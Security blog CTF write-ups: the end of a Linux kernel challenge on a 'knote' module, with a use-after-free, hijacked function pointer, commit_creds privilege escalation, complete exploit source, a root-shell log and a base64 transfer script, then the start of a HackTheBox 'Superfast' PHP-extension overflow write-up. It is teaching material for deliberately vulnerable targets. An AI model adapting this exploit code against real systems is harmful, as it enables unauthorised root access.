            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            knotes[ku.idx]->decrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
        default:
            mutex_unlock(&knote_ioctl_lock);
            return -EINVAL;
    }
    mutex_unlock(&knote_ioctl_lock);
    return 0;
}

static int __init init_knote(void) {
    major = register_chrdev(0, DEVICE_NAME, &knote_fops);
    if(major < 0)
        return -1;

    knote_class = class_create(THIS_MODULE, CLASS_NAME);
    if (IS_ERR(knote_class)) {
        unregister_chrdev(major, DEVICE_NAME);
        return -1;
    }

    knote_device = device_create(knote_class, 0, MKDEV(major, 0), 0, DEVICE_NAME);
    if (IS_ERR(knote_device))
    {
        class_destroy(knote_class);
        unregister_chrdev(major, DEVICE_NAME);
        return -1;
    }

    return 0;
}

static void __exit exit_knote(void)
{
    device_destroy(knote_class, MKDEV(major, 0));
    class_unregister(knote_class);
    class_destroy(knote_class);
    unregister_chrdev(major, DEVICE_NAME);
}

module_init(init_knote);
module_exit(exit_knote);

knote.c source code

The first thing that the kernel calls in a newly inserted module (in this case knote.ko) is the function marked with the __init keyword, which here is the following init function:

static int __init init_knote(void) {
    major = register_chrdev(0, DEVICE_NAME, &knote_fops);
    if(major < 0)
        return -1;

    knote_class = class_create(THIS_MODULE, CLASS_NAME);
    if (IS_ERR(knote_class)) {
        unregister_chrdev(major, DEVICE_NAME);
        return -1;
    }

    knote_device = device_create(knote_class, 0, MKDEV(major, 0), 0, DEVICE_NAME);
    if (IS_ERR(knote_device))
    {
        class_destroy(knote_class);
        unregister_chrdev(major, DEVICE_NAME);
        return -1;
    }

    return 0;
}

First function called in the kmodule

As we can see, it registers a character device (chrdev) with the name "knote" and it registers the device operation unlocked_ioctl, which means that it's possible to interact with the device using ioctl().

static struct file_operations knote_fops = {
    .unlocked_ioctl = knote_ioctl
};

Knote.ko file operations

This means that our only userland way of interacting with the kmodule is ioctl(), which invokes the knote_ioctl function. As said, we need to use int ioctl(int fd, unsigned long request, ...) in the exploit to pass the file, cmd and arg arguments to long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg). This function implements several commands: KNOTE_CREATE, KNOTE_DELETE, KNOTE_READ, KNOTE_ENCRYPT and KNOTE_DECRYPT.
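On x86_64, struct knote_user is three 8-byte fields, so the arg buffer handed to ioctl() is 24 bytes. A quick sketch of packing it from userland (the field layout is taken from the source below; actually issuing the ioctl of course requires the module to be loaded):

```python
import struct

KNOTE_CREATE = 0x1337  # from enum knote_ioctl_cmd

def pack_knote_user(idx: int, data_ptr: int, length: int) -> bytes:
    # struct knote_user { unsigned long idx; char *data; size_t len; }
    # -> three little-endian 64-bit fields on x86_64
    return struct.pack("<QQQ", idx, data_ptr, length)

# Example: note index 1, a (hypothetical) userland buffer address, len 0x20
ku = pack_knote_user(idx=1, data_ptr=0xdeadbeef, length=0x20)
print(len(ku))  # 24, i.e. sizeof(struct knote_user) on x86_64
```

The exploit later builds exactly this struct in C; the sketch just makes the in-memory layout that copy_from_user() reads explicit.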

static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    mutex_lock(&knote_ioctl_lock);
    
    struct knote_user ku;
    if(copy_from_user(&ku, (void *)arg, sizeof(struct knote_user)))
        return -EFAULT;

    switch(cmd) {
        case KNOTE_CREATE:
            // unsigned values
            if(ku.len > 0x20 || ku.idx >= 10)
                return -EINVAL;

            // create knote
            char *data = kmalloc(ku.len, GFP_KERNEL);
            knotes[ku.idx] = kmalloc(sizeof(struct knote), GFP_KERNEL);
            if(data == NULL || knotes[ku.idx] == NULL) 
            {
                mutex_unlock(&knote_ioctl_lock);
                return -ENOMEM;
            }

            // copy userdata to note data
            knotes[ku.idx]->data = data;
            knotes[ku.idx]->len = ku.len;
            if(copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) {
                kfree(knotes[ku.idx]->data);
                kfree(knotes[ku.idx]);
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            knotes[ku.idx]->encrypt_func = knote_encrypt;
            knotes[ku.idx]->decrypt_func = knote_decrypt;
            break;
        case KNOTE_DELETE:
            if(ku.idx >= 10 || !knotes[ku.idx]) 
            {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            
            kfree(knotes[ku.idx]->data);
            kfree(knotes[ku.idx]);
            knotes[ku.idx] = NULL;
            break;
        case KNOTE_READ:
            if (ku.idx >= 10 || !knotes[ku.idx] || ku.len > knotes[ku.idx]->len)
            {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }
            
            if (copy_to_user(ku.data, knotes[ku.idx]->data, ku.len)) 
            {
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            break;
        case KNOTE_ENCRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) 
            {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }

            knotes[ku.idx]->encrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
         case KNOTE_DECRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }

            knotes[ku.idx]->decrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
        default:
            mutex_unlock(&knote_ioctl_lock);
            return -EINVAL;
    }
    mutex_unlock(&knote_ioctl_lock);
    return 0;
}

knote_ioctl() - used for interacting through ioctl()

As we can read, the arg parameter is used to supply values to a knote_user object, using copy_from_user(&ku, arg, sizeof(struct knote_user)): this copies sizeof(struct knote_user) bytes from the userland pointer arg to the kernel pointer &ku. Secondly, it executes one of the KNOTE_<CMD> cases.

Finding primitives

The first step of exploit development is identifying protections: earlier we found out that there are no active kernel protections (no KASLR, no SMAP, no SMEP, et cetera). Next comes finding exploit primitives: let's start off with finding execution-flow hijacking. Firstly I checked for any form of buffer overflow bug on the stack and on the heap, but I couldn't find anything. However, once I took a look at KNOTE_CREATE, I saw that a use-after-free bug can be triggered.

Finding a memory corruption bug

The KNOTE_CREATE command allocates a knote and its data using kmalloc, which stands for kernel malloc. Then, it tries to copy the userland data to the kernel note data. However, if that copy fails, it will kfree (kernel free) both the knote and the knote's data.

static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    mutex_lock(&knote_ioctl_lock);
    
    struct knote_user ku;
    if(copy_from_user(&ku, (void *)arg, sizeof(struct knote_user)))
        return -EFAULT;

    switch(cmd) {
        case KNOTE_CREATE:
            // unsigned values
            if(ku.len > 0x20 || ku.idx >= 10)
                return -EINVAL;

            // create knote
            char *data = kmalloc(ku.len, GFP_KERNEL);
            knotes[ku.idx] = kmalloc(sizeof(struct knote), GFP_KERNEL);
            // ...
            
            // copy userdata to note data
            knotes[ku.idx]->data = data;
            knotes[ku.idx]->len = ku.len;
            if(copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) {
                kfree(knotes[ku.idx]->data);
                kfree(knotes[ku.idx]);
                mutex_unlock(&knote_ioctl_lock);
                return -EFAULT;
            }
            knotes[ku.idx]->encrypt_func = knote_encrypt;
            knotes[ku.idx]->decrypt_func = knote_decrypt;
            break;
        // ...
        default:
            mutex_unlock(&knote_ioctl_lock);
            return -EINVAL;
    }
    mutex_unlock(&knote_ioctl_lock);
    return 0;
}

Before we dive into the details, please realize that the kernel heap cache works like a stack containing heap chunk pointers: you push them with kfree and pop them with kmalloc (LIFO reuse).
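As a toy model of that behaviour (a Python stand-in for the slab freelist; real allocators are more involved, but LIFO reuse is the property we rely on):

```python
# Toy model of a kernel heap cache: the per-cache freelist behaves
# like a stack of recently freed chunks.
freelist = []

def kfree(chunk):
    freelist.append(chunk)   # push: chunk becomes the next one handed out

def kmalloc():
    return freelist.pop()    # pop: reuse the most recently freed chunk

kfree("chunk_A")
kfree("chunk_B")
print(kmalloc())  # chunk_B - last freed, first reused
print(kmalloc())  # chunk_A
```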

It took me a bit of puzzling, but I figured out that we can leverage this to trigger a use-after-free (UAF) bug. If we create a knote that fails copy_from_user by providing an invalid pointer, the kmodule will kfree(data) and after that kfree(knote), but it won't reset knotes[ku.idx] = NULL. Additionally, the allocation happens in the unfortunate order of kmalloc(data) and then kmalloc(knote). Because of this, a peculiar UAF scenario arises in the kernel memory cache, where we can overwrite the freed struct still referenced by knotes[ku.idx] with userland ku.data. For clarification of this mind-boggling bug, I have made the following diagram:

Description of the UAF bug
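The same scenario can be replayed with a small simulation (a Python stand-in for the kmalloc-32 freelist, assuming strict LIFO reuse; chunk names are ours):

```python
# Simulate the freelist (LIFO) across the failed KNOTE_CREATE and the
# second KNOTE_CREATE, tracking which chunk each pointer lands on.
freelist = []
counter = 0

def kmalloc():
    global counter
    if freelist:
        return freelist.pop()      # reuse most recently freed chunk
    counter += 1
    return f"chunk_{counter}"      # fresh chunk otherwise

def kfree(chunk):
    freelist.append(chunk)

# KNOTE_CREATE #1 with a bad userland pointer (copy_from_user fails):
data1 = kmalloc()   # chunk_1
note1 = kmalloc()   # chunk_2 - the stale knotes[idx] keeps pointing here
kfree(data1)        # freelist: [chunk_1]
kfree(note1)        # freelist: [chunk_1, chunk_2]

# KNOTE_CREATE #2 with a valid pointer:
data2 = kmalloc()   # pops chunk_2 - the old knote struct!
note2 = kmalloc()   # pops chunk_1

# copy_from_user now writes our bytes through data2, i.e. straight over
# the struct knote that the stale knotes[idx] entry still references.
print(data2 == note1)  # True
```

So the second create's data buffer lands exactly on top of the dangling struct, letting us forge its encrypt_func pointer with fully controlled userland bytes.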

Finding a way to hijack execution flow

Now that we have a UAF bug, we need to find a way to get code execution by utilizing it. After analyzing more commands, I noticed that the KNOTE_ENCRYPT command calls knote->encrypt_func, a function pointer stored in the knote structure.

struct knote {
    char *data;
    size_t len;
    void (*encrypt_func)(char *, size_t);
    void (*decrypt_func)(char *, size_t);
};

The knote structure

static long knote_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    mutex_lock(&knote_ioctl_lock);
    
    struct knote_user ku;
    if(copy_from_user(&ku, (void *)arg, sizeof(struct knote_user)))
        return -EFAULT;

    switch(cmd) {
        // ...
        case KNOTE_ENCRYPT:
            if(ku.idx >= 10 || !knotes[ku.idx]) 
            {
                mutex_unlock(&knote_ioctl_lock);
                return -EINVAL;
            }

            knotes[ku.idx]->encrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
            break;
         // ...
        default:
            mutex_unlock(&knote_ioctl_lock);
            return -EINVAL;
    }
    mutex_unlock(&knote_ioctl_lock);
    return 0;
}

The KNOTE_ENCRYPT command

This means we can execute arbitrary code by triggering the UAF, overwriting knote->encrypt_func, and then calling it.

Creating an exploit

Now that we have our primitives for local code execution through the UAF bug in the kernel module, we can start building the exploit. First, I defined the kernel-module-specific code, such as the structures and the ioctl() calls used to interact with the kmodule. These structures are copied from the knote.c file.

int FD_KNOTE;

enum knote_ioctl_cmd {
    KNOTE_CREATE = 0x1337,
    KNOTE_DELETE = 0x1338,
    KNOTE_READ = 0x1339,
    KNOTE_ENCRYPT = 0x133a,
    KNOTE_DECRYPT = 0x133b
};


typedef struct {
    unsigned long idx;
    char * data;
    size_t len;
} knote_user_t;


typedef struct {
    char *data;
    size_t len;
    void (*encrypt_func)(char *, size_t);
    void (*decrypt_func)(char *, size_t);
} knote_t;


void cmd_send(unsigned long cmd, unsigned long idx, char* data, size_t len)
{
    knote_user_t user;
    user.idx = idx;
    user.data = data;
    user.len = len;

    int retv = ioctl(FD_KNOTE, cmd, &user);
    printf("ioctl(fd=%d, cmd=0x%x, &ku=%p) -> %d\n", FD_KNOTE, cmd, &user, retv);
}

The contextual part of the exploit

With all the necessary kernel module code in place, I created the UAF code. Ignore the set_ctx_reg() and privesc_ctx_swp references for now; they are explained below. As you can see, we first trigger the swap by allocating a knote with an invalid data pointer, so that kn->data ends up pointing to kn itself. Then, we allocate our custom kn by passing it as kn->data. Note that I'm using knote index 1 instead of 0, to prevent encrypt_func from being overwritten by the following code in knote.c:

switch(cmd) {
    case KNOTE_CREATE:
		// copy userdata to note data
        knotes[ku.idx]->data = data;
        knotes[ku.idx]->len = ku.len;
        if(copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) {
            kfree(knotes[ku.idx]->data);
            kfree(knotes[ku.idx]);
            mutex_unlock(&knote_ioctl_lock);
            return -EFAULT;
        }
        knotes[ku.idx]->encrypt_func = knote_encrypt;
        knotes[ku.idx]->decrypt_func = knote_decrypt;
}

The code overwriting encrypt_func

#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/xattr.h>
#include <unistd.h>
#include "kpwn.c"


int FD_KNOTE;

enum knote_ioctl_cmd {
    // ...
};


typedef struct {
    // ...
} knote_user_t;


typedef struct {
    // ...
} knote_t;


void cmd_send(unsigned long cmd, unsigned long idx, char* data, size_t len)
{
	// ...
}

void main()
{
    FD_KNOTE = open("/dev/knote", O_RDONLY);
    if (FD_KNOTE < 0)
    {
        puts("main(): open failed");
        exit(1);
    }

    /* case KNOTE_CREATE:
     *     char *data = kmalloc(ku.len, GFP_KERNEL);
     *     knotes[ku.idx] = kmalloc(sizeof(struct knote), GFP_KERNEL);
     *     knotes[ku.idx]->data = data;
     *     knotes[ku.idx]->len = len;
     *     if (copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) 
     *     {
     *         kfree(knotes[ku.idx]->data);
     *         kfree(knotes[ku.idx]);
     *         return -EFAULT;
     *     }
     *
     *      knotes[ku.idx]->encrypt_func = knote_encrypt;
     *      knotes[ku.idx]->decrypt_func = knote_decrypt;
     *
     * doesn't reset knotes[ku.idx] upon failure
     * note: the next kmalloc(data) reclaims the chunk freed by kfree(knote)
     */

    puts("[*] creating note 0: fail pls");
    cmd_send(KNOTE_CREATE, 0, (void*)0x1337, 32);
 
    set_ctx_reg();

    knote_t payload_knote;
    payload_knote.data = "idc3";
    payload_knote.len = 5;
    payload_knote.encrypt_func = &privesc_ctx_swp;
    payload_knote.decrypt_func = &privesc_ctx_swp;

    prepare_kernel_cred = 0xffffffff81053c50;
    commit_creds = 0xffffffff81053a30;

    printf("[*] new knote_t size: %lu\n", sizeof(knote_t));
    puts("[*] allocating malicious payload knote");
    cmd_send(KNOTE_CREATE, 1, &payload_knote, 32);
    
    // ...
}

The new code that triggers UAF

Then, we're triggering the function call to encrypt_func by using KNOTE_ENCRYPT:

#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/xattr.h>
#include <unistd.h>
#include "kpwn.c"


int FD_KNOTE;

enum knote_ioctl_cmd {
    // ...
};


typedef struct {
    // ...
} knote_user_t;


typedef struct {
    // ...
} knote_t;


void cmd_send(unsigned long cmd, unsigned long idx, char* data, size_t len)
{
    // ...
}

void main()
{
    // ...
    
    /* case KNOTE_ENCRYPT:
     *     if (ku.idx >= 10 || !knotes[ku.idx]) 
     *     {
     *         mutex_unlock(&knote_ioctl_lock);
     *         return -EINVAL;
     *     }
     *     knotes[ku.idx]->encrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
     * 
     * trigger function call to encrypt_func
     */
    puts("[*] calling (hopefully overwritten) encrypt function");
    cmd_send(KNOTE_ENCRYPT, 0, "idc4", 5);

    puts("[-] exploit failed :(");
}

The code triggering the exploit

Now, coming back to set_ctx_reg() and privesc_ctx_swp(). When we perform the code-execution attack in the kmodule, we are running in kernel space, whilst we want to run a shell as root in userland. To get our beloved shell, we need to perform a context swap from kernel to userland; such a swap happens on the return path of every system call, so it's a well-trodden mechanism. To keep this write-up relatively short, you can read more about it in the context swapping blogpost by geekculture.

Since these functions are very standard and used in most kernel pwn challenges I made it a header file:

long prepare_kernel_cred = 0xDEADC0D3;
long commit_creds = 0xDEADC0DE;
long _proc_cs, _proc_ss, _proc_rsp, _proc_rflags = 0;

void set_ctx_reg() {
    __asm__(".intel_syntax noprefix;"
            "mov _proc_cs, cs;"
            "mov _proc_ss, ss;"
            "mov _proc_rsp, rsp;"
            "pushf;" // push rflags
            "pop _proc_rflags;"
            ".att_syntax");

    printf("[+] CS: 0x%lx, SS: 0x%lx, RSP: 0x%lx, RFLAGS: 0x%lx\n", _proc_cs, _proc_ss, _proc_rsp, _proc_rflags);
}


void spawn_shell()
{
    puts("[+] Hello Userland!");
    int uid = getuid();
    if (uid == 0)
        printf("[+] UID: %d (root poggers)\n", uid);
    else {
        printf("[!] UID: %d (epic fail)\n", uid);
    }

    puts("[*] starting shell");
    system("/bin/sh");

    puts("[*] quitting exploit");
    exit(0); // avoid ugly segfault
}

void privesc_ctx_swp()
{
    __asm__(".intel_syntax noprefix;"
            /**
             * struct cred *prepare_kernel_cred(struct task_struct *daemon)
             * @daemon: A userspace daemon to be used as a reference
             *
             * If @daemon is supplied, then the security data will be derived from that;
             * otherwise they'll be set to 0 and no groups, full capabilities and no keys.
             *
             * Returns the new credentials or NULL if out of memory.
             */
            "xor rdi, rdi;"
            "movabs rax, prepare_kernel_cred;"
            "call rax;" // prepare_kernel_cred(0)

            /**
             * int commit_creds(struct cred *new)
             * @new: The credentials to be assigned
             */
            "mov rdi, rax;" // RAX contains cred pointer
            "movabs rax, commit_creds;"
            "call rax;"

            // setup the context swapping
            "swapgs;" // swap GS to userland

            "mov r15, _proc_ss;"
            "push r15;"
            "mov r15, _proc_rsp;"
            "push r15;"
            "mov r15, _proc_rflags;"
            "push r15;"
            "mov r15, _proc_cs;"
            "push r15;"
            "lea r15, spawn_shell;" // lea rip, spawn_shell ; when returning to userland
            "push r15;"
            "iretq;" // swap context to userland
            ".att_syntax;");
}

Content of kpwn.c

In a nutshell, the context swap requires the userland values of the ss, rsp, rflags, and cs registers, since they are mission-critical for returning to the userland context. We save those registers in the set_ctx_reg() function:

long _proc_cs, _proc_ss, _proc_rsp, _proc_rflags = 0;

void set_ctx_reg() {
    __asm__(".intel_syntax noprefix;"
            "mov _proc_cs, cs;"
            "mov _proc_ss, ss;"
            "mov _proc_rsp, rsp;"
            "pushf;" // push rflags
            "pop _proc_rflags;"
            ".att_syntax");

    printf("[+] CS: 0x%lx, SS: 0x%lx, RSP: 0x%lx, RFLAGS: 0x%lx\n", _proc_cs, _proc_ss, _proc_rsp, _proc_rflags);
}

set_ctx_reg() content

After saving them, we can use our own privesc-and-context-swap function, which also sets the new userland instruction pointer. Keep in mind that the following code snippet references global variables from the assembly. The code starts off by calling prepare_kernel_cred(0) (which prepares credentials for UID 0 and GID 0) and then calls commit_creds(creds) to permanently apply those credentials to the process. Finally, it pushes the saved context-swap registers onto the stack and performs the swap with iretq.

void privesc_ctx_swp()
{
    __asm__(".intel_syntax noprefix;"
            /**
             * struct cred *prepare_kernel_cred(struct task_struct *daemon)
             * @daemon: A userspace daemon to be used as a reference
             *
             * If @daemon is supplied, then the security data will be derived from that;
             * otherwise they'll be set to 0 and no groups, full capabilities and no keys.
             *
             * Returns the new credentials or NULL if out of memory.
             */
            "xor rdi, rdi;"
            "movabs rax, prepare_kernel_cred;"
            "call rax;" // prepare_kernel_cred(0)

            /**
             * int commit_creds(struct cred *new)
             * @new: The credentials to be assigned
             */
            "mov rdi, rax;" // RAX contains cred pointer
            "movabs rax, commit_creds;"
            "call rax;"

            // setup the context swapping
            "swapgs;" // swap GS to userland

            "mov r15, _proc_ss;"
            "push r15;"
            "mov r15, _proc_rsp;"
            "push r15;"
            "mov r15, _proc_rflags;"
            "push r15;"
            "mov r15, _proc_cs;"
            "push r15;"
            "lea r15, spawn_shell;" // lea rip, spawn_shell ; when returning to userland
            "push r15;"
            "iretq;" // swap context to userland
            ".att_syntax;");
}

The privesc_ctx_swp() function

This sets the new RIP to spawn_shell, which contains our userland code to spawn a shell:

void spawn_shell()
{
    puts("[+] Hello Userland!");
    int uid = getuid();
    if (uid == 0)
        printf("[+] UID: %d (root poggers)\n", uid);
    else {
        printf("[!] UID: %d (epic fail)\n", uid);
    }

    puts("[*] starting shell");
    system("/bin/sh");

    puts("[*] quitting exploit");
    exit(0); // avoid ugly segfault
}

The spawn_shell() function which calls /bin/sh from userland

In our exploit we prepared the userland context registers, made a fake UAF knote object that would trigger privesc_ctx_swp, and set the addresses for the kernel functions prepare_kernel_cred and commit_creds.

    set_ctx_reg();

    knote_t payload_knote;
    payload_knote.data = "idc3";
    payload_knote.len = 5;
    payload_knote.encrypt_func = &privesc_ctx_swp;
    payload_knote.decrypt_func = &privesc_ctx_swp;

    prepare_kernel_cred = 0xffffffff81053c50;
    commit_creds = 0xffffffff81053a30;

    printf("[*] new knote_t size: %lu\n", sizeof(knote_t));
    puts("[*] allocating malicious payload knote");
    cmd_send(KNOTE_CREATE, 1, &payload_knote, 32);

A subsection of the exploit which sets the privesc up

Then, I tested the exploit locally by compiling it using compress.sh (given earlier in this post):

~ $ whoami
user
~ $ /exploit
exploit         exploit_easy    exploit_easy.c  exploit_real.c
~ $ /exploit_easy
[*] creating note 0: fail pls
ioctl(fd=3, cmd=0x1337, &ku=0x7fff3d3605c0) -> -1
[+] CS: 0x33, SS: 0x2b, RSP: 0x7fff3d3605e0, RFLAGS: 0x246
[*] new knote_t size: 32
[*] allocating malicious payload knote
ioctl(fd=3, cmd=0x1337, &ku=0x7fff3d3605c0) -> 0
[*] calling (hopefully overwritten) encrypt function
[+] Hello Userland!
[+] UID: 0 (root poggers)
[*] starting shell
/bin/sh: can't access tty; job control turned off
/home/user # whoami
root
/home/user #

Exploit proof-of-concept (PoC)

If you want to try the exploit yourself, here's the complete source code for exploit.c:

#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/xattr.h>
#include <unistd.h>
#include "kpwn.c"


int FD_KNOTE;

enum knote_ioctl_cmd {
    KNOTE_CREATE = 0x1337,
    KNOTE_DELETE = 0x1338,
    KNOTE_READ = 0x1339,
    KNOTE_ENCRYPT = 0x133a,
    KNOTE_DECRYPT = 0x133b
};


typedef struct {
    unsigned long idx;
    char * data;
    size_t len;
} knote_user_t;


typedef struct {
    char *data;
    size_t len;
    void (*encrypt_func)(char *, size_t);
    void (*decrypt_func)(char *, size_t);
} knote_t;


void cmd_send(unsigned long cmd, unsigned long idx, char* data, size_t len)
{
    knote_user_t user;
    user.idx = idx;
    user.data = data;
    user.len = len;

    int retv = ioctl(FD_KNOTE, cmd, &user);
    printf("ioctl(fd=%d, cmd=0x%x, &ku=%p) -> %d\n", FD_KNOTE, cmd, &user, retv);
}

void main()
{
    FD_KNOTE = open("/dev/knote", O_RDONLY);
    if (FD_KNOTE < 0)
    {
        puts("main(): open failed");
        exit(1);
    }

    /* case KNOTE_CREATE:
     *     char *data = kmalloc(ku.len, GFP_KERNEL);
     *     knotes[ku.idx] = kmalloc(sizeof(struct knote), GFP_KERNEL);
     *     knotes[ku.idx]->data = data;
     *     knotes[ku.idx]->len = len;
     *     if (copy_from_user(knotes[ku.idx]->data, ku.data, ku.len)) 
     *     {
     *         kfree(knotes[ku.idx]->data);
     *         kfree(knotes[ku.idx]);
     *         return -EFAULT;
     *     }
     *
     *      knotes[ku.idx]->encrypt_func = knote_encrypt;
     *      knotes[ku.idx]->decrypt_func = knote_decrypt;
     *
     * doesn't reset knotes[ku.idx] upon failure
     * note: the next kmalloc(data) reclaims the chunk freed by kfree(knote)
     */

    puts("[*] creating note 0: fail pls");
    cmd_send(KNOTE_CREATE, 0, (void*)0x1337, 32);
 
    set_ctx_reg();

    knote_t payload_knote;
    payload_knote.data = "idc3";
    payload_knote.len = 5;
    payload_knote.encrypt_func = &privesc_ctx_swp;
    payload_knote.decrypt_func = &privesc_ctx_swp;

    prepare_kernel_cred = 0xffffffff81053c50;
    commit_creds = 0xffffffff81053a30;

    printf("[*] new knote_t size: %lu\n", sizeof(knote_t));
    puts("[*] allocating malicious payload knote");
    cmd_send(KNOTE_CREATE, 1, &payload_knote, 32);
    
    /* case KNOTE_ENCRYPT:
     *     if (ku.idx >= 10 || !knotes[ku.idx]) 
     *     {
     *         mutex_unlock(&knote_ioctl_lock);
     *         return -EINVAL;
     *     }
     *     knotes[ku.idx]->encrypt_func(knotes[ku.idx]->data, knotes[ku.idx]->len);
     * 
     * trigger function call to encrypt_func
     */
    puts("[*] calling (hopefully overwritten) encrypt function");
    cmd_send(KNOTE_ENCRYPT, 0, "idc4", 5);

    puts("[-] exploit failed :(");
}

Complete exploit.c

Now it's time to run the exploit on the remote machine. I deliberately chose musl-gcc as the compiler in compress.sh since it decreases the size of static builds a lot: the static binaries from gcc and musl-gcc are respectively 800000 bytes and 34000 bytes. To transfer the exploit to the remote machine, I used encode.sh to encode the exploit binary, copied it to the clipboard, and decoded it using Bash utilities on the remote machine:

#!/bin/sh
tar -czO "$1" | base64 -w160

printf '\n\n===== TO DECODE =====\n' > /dev/stderr
printf 'echo <...> | base64 -d | tar -xzO > exploit\n' > /dev/stderr

The encode.sh used to transfer files from local machine to the remote CTF box

$ encode.sh initramfs/exploit | xsel -b


===== TO DECODE =====
echo <...> | base64 -d | tar -xzO > exploit

Proof-of-concept of encode.sh to encode the binary

Afterword

I really hope you enjoyed the challenge and write-up as much as I did. Please let me know on Twitter if you want me to make a write-up about exploiting this CTF with real kernel primitives like seq_operations and setxattr.

If you like this pwn content, please check out the HackTheBox - Blacksmith write-up, or check out the Heap Memory and Linux Kernel tag pages on the site to read more kernel-related blogposts.

]]>
<![CDATA[Superfast (HackTheBox)]]>
https://pwning.tech/superfast/658f44f8d32e980001de21ecMon, 28 Nov 2022 13:21:02 GMT

Hey folks. In this write-up, we're going to discuss the Superfast challenge from HackTheBox, which was part of the HackTheBox Business CTF 2022. We're going to perform a single-byte overwrite to bypass ASLR, leak stack pointers, and build a Return Oriented Programming (ROP) chain. The description of the challenge is:

We've tracked connections made from an infected workstation back to this server. We believe it is running a C2 checkin interface, the source code of which we acquired from a temporarily exposed Git repository several months ago. Apparently the engineers behind it are obsessed with speed, extending their programs with low-level code. We think in their search for speed they might have cut some corners - can you find a way in?

I really enjoyed pwning this challenge since it has a unique and quite realistic target which I haven't seen before in CTFs.

Index

  • First looks
  • Finding primitives
  • Developing the ROP chain
  • Retrieving the flag

First looks

We're given a PHP file with a shared object (.so) written in C, and we're given a source directory for the shared object.

.
├── build_docker.sh
├── challenge
│   ├── index.php
│   ├── php_logger.so
│   └── start.sh
├── Dockerfile
└── src
    ├── build.sh
    ├── config.m4
    ├── php_logger.c
    └── php_logger.h

2 directories, 9 files

Directories given with the challenge

In /challenge/start.sh we can see that the challenge code gets bootstrapped using:

#!/bin/sh
while true; do php -dextension=/php_logger.so -S 0.0.0.0:1337; done

The content of start.sh

We can see that PHP loads php_logger.so as a binary extension for the webserver.

Finding primitives

To start: a vulnerability primitive is a building block of an exploit. Primitives can be combined with each other to achieve a higher impact, like teamwork.

Analysing index.php

The content of index.php (below) checks for a header called Cmd-Key and a parameter cmd.

<?php
if (isset($_SERVER['HTTP_CMD_KEY']) && isset($_GET['cmd'])) {
	$key = intval($_SERVER['HTTP_CMD_KEY']);
	if ($key <= 0 || $key > 255) {
		http_response_code(400);
	} else {
		log_cmd($_GET['cmd'], $key);
	}
} else {
	http_response_code(400);
}

Content of index.php

One of the most important stages of exploit development is setting up a reproduction environment. Since I want to run GDB on php_logger.so, I run the challenge without Docker: serve index.php with php -dextension=./php_logger.so -S 0.0.0.0:1337 from /challenge/, and send an HTTP request using curl 'http://127.0.0.1:1337/index.php?cmd=123' -H 'Cmd-Key: 123'. We can see it succeeds because it returns a 200 status code.

[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Accepted
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 [200]: GET /?cmd=123
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Closing

Verbose output of the PHP webserver

Regarding functionality, we can see that index.php calls log_cmd($cmd, $key) with 0 < $key < 256.

Analyzing php_logger.so

We can find the source code of php_logger.so in /src/php_logger.c, which contains the source of log_cmd() as well. We can see that log_cmd() retrieves its function arguments using zend_parse_parameters(). Then, it calls decrypt($cmd, $cmdlen, $key) and - if the return value is valid - appends the result to the /tmp/log file.

PHP_FUNCTION(log_cmd) {
    char* input;
    zend_string* res;
    size_t size;
    long key;
    if (zend_parse_parameters(ZEND_NUM_ARGS(), "sl", &input, &size, &key) == FAILURE) {
        RETURN_NULL();
    }
    res = decrypt(input, size, (uint8_t)key);
    if (!res) {
        print_message("Invalid input provided\n");
    } else {
        FILE* f = fopen("/tmp/log", "a");
        fwrite(ZSTR_VAL(res), ZSTR_LEN(res), 1, f);
        fclose(f);
    }
    RETURN_NULL();
}

Source code of log_cmd()

This function looks safe, so the vulnerability must be in decrypt(input, size, key). That function checks whether the size of the command is less than the size of the stack buffer: if it is larger it returns NULL, and otherwise it memcpy()s the input into the buffer and XORs the buffer with the key.

zend_string* decrypt(char* buf, size_t size, uint8_t key) {
    char buffer[64] = {0};
    if (sizeof(buffer) - size > 0) {
        memcpy(buffer, buf, size);
    } else {
        return NULL;
    }
    for (int i = 0; i < sizeof(buffer) - 1; i++) {
        buffer[i] ^= key;
    }
    return zend_string_init(buffer, strlen(buffer), 0);
}

Source code of decrypt()

We can see that sizeof(buffer) - size > 0 is used as the size check. However, sizeof() returns size_t, which is an unsigned integer on 32-bit and (in this case) an unsigned long on 64-bit, and size is a size_t as well. Since the whole subtraction is performed on unsigned values, the result cannot go negative and wraps around instead. For example, (uint)0 - (uint)1 becomes 2**32 - 1, instead of -1. A practical example is the program below, whose output is 4294967295 1.

#include <stdio.h>

int main()
{
    unsigned int a = 5;
    int b = 6;

    printf("%u %d", a - b, a - b > 0);
}

Demo of interaction between (unsigned) integers

